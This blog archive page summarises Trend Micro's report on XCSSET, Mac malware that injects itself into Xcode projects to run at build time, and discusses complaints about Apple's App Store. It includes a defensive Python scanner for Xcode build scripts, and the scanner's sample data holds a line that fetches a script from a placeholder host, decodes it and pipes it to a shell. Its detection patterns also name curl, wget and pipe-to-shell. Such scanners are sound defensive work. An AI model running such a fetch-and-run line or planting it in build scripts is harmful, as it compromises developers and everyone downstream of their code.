Archive for August 14, 2020

Friday, August 14, 2020

XCSSET Mac Malware

Trend Micro (via Dave Verwer):

We have discovered an unusual infection related to Xcode developer projects. Upon further investigation, we discovered that a developer’s Xcode project at large contained the source malware, which leads to a rabbit hole of malicious payloads. Most notable in our investigation is the discovery of two zero-day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, another is used to abuse the development version of Safari.

This scenario is quite unusual; in this case, malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat in sources such as VirusTotal, which indicates this threat is at large.

This blog will summarize the findings of this threat, while its accompanying technical brief contains the full details of this attack.
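The build-time injection described above is the part a developer can check for before building a freshly cloned project. As an added example (not code from Trend Micro's brief or from the original post), this Python snippet lists the Run Script build phases in a project.pbxproj and flags constructs worth reading first; the pbxproj excerpt is constructed, the pattern list is the author's own choice, and the parser assumes Xcode's habit of writing `isa` as the first key of each object.

```python
import re

# Constructed excerpt of an Xcode project.pbxproj (OpenStep plist), not from any real project.
SAMPLE_PBXPROJ = r'''
		AA11 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
		};
		BB22 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellScript = "swiftlint --quiet\n";
		};
		CC33 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellScript = "echo \"build\"\ncurl -s http://example.invalid/p | base64 -D | sh\n";
		};
'''

# Xcode writes "isa" as the first key of each object, so anchor on the phase type (assumed layout).
PHASE_RE = re.compile(r"(\w+)\s*(?:/\*[^*]*\*/)?\s*=\s*\{\s*isa = PBXShellScriptBuildPhase;")
# Quoted pbxproj string; backslash escapes (\" and \n) stay escaped until unescape().
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)";')

# Build-script constructs that merit a manual read before building an untrusted project.
REVIEW_PATTERNS = {
    "network_fetch": re.compile(r"\b(curl|wget)\b"),
    "decode": re.compile(r"\bbase64\b.*-[dD]\b|\bxxd\s+-r"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash|zsh|python\d?|osascript)\b"),
    "eval": re.compile(r"\beval\b"),
}

def unescape(s):
    """Resolve pbxproj backslash escapes in a single pass."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)

def extract_build_scripts(pbxproj_text):
    """Return {object_id: script_text} for every PBXShellScriptBuildPhase object."""
    scripts = {}
    for m in PHASE_RE.finditer(pbxproj_text):
        # Confine the search to this object's keys: stop at the next object's "isa = ".
        end = pbxproj_text.find("isa = ", m.end())
        body = pbxproj_text[m.end():end if end != -1 else len(pbxproj_text)]
        s = SCRIPT_RE.search(body)
        scripts[m.group(1)] = unescape(s.group(1)) if s else ""
    return scripts

def review_build_scripts(pbxproj_text):
    """Return [(object_id, [pattern names matched])]; an empty list means nothing was flagged."""
    return [(obj_id, [name for name, pat in REVIEW_PATTERNS.items() if pat.search(script)])
            for obj_id, script in extract_build_scripts(pbxproj_text).items()]
```

Run `review_build_scripts(open("MyApp.xcodeproj/project.pbxproj").read())` on a cloned repository to see which script phases need a look before the first build; a flagged phase is a prompt to read it, not a verdict.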


Update (2020-08-17): See also: Hacker News.

Update (2020-08-24): Hartley Charlton:

In an exclusive interview with MacRumors, the security researchers behind the discovery, Oleksandr Shatkivskyi and Vlad Felenuik, have provided more information about their research.

Outlining Complaints About the App Store

Josh Centers:

At this critical juncture for the company, we wanted to take the opportunity to analyze the complaints against Apple regarding how it runs the App Store. We’ve spent a long time observing and considering these issues, and you may agree or disagree with our evaluation and conclusions. As we are neither regulators nor Apple executives, the decisions are ultimately not up to us. We merely want to lay out the issues and offer suggestions on how Apple can improve, for the sake of users, developers, and even the long-term viability of the company itself.


The most likely path forward is for Apple to do nothing different until forced to change by a regulatory body. I say this is the most likely, because, from Apple’s statements, the company seems to think it has nothing to apologize for and feels that it is doing the world a favor in the way it’s running the App Store.

However, I think this would be a mistake that both the company and its fans would eventually regret.

There’s been a lot of App Store news over the last few months, and this article ties it all together.


Update (2020-08-18): See also: Background Mode.

Update (2020-08-24): Josh Centers:

It turns out that, although TidBITS readers are largely critical of how Apple runs the App Store, they’re also against government regulation as a solution. Let’s dig into the survey questions and your responses.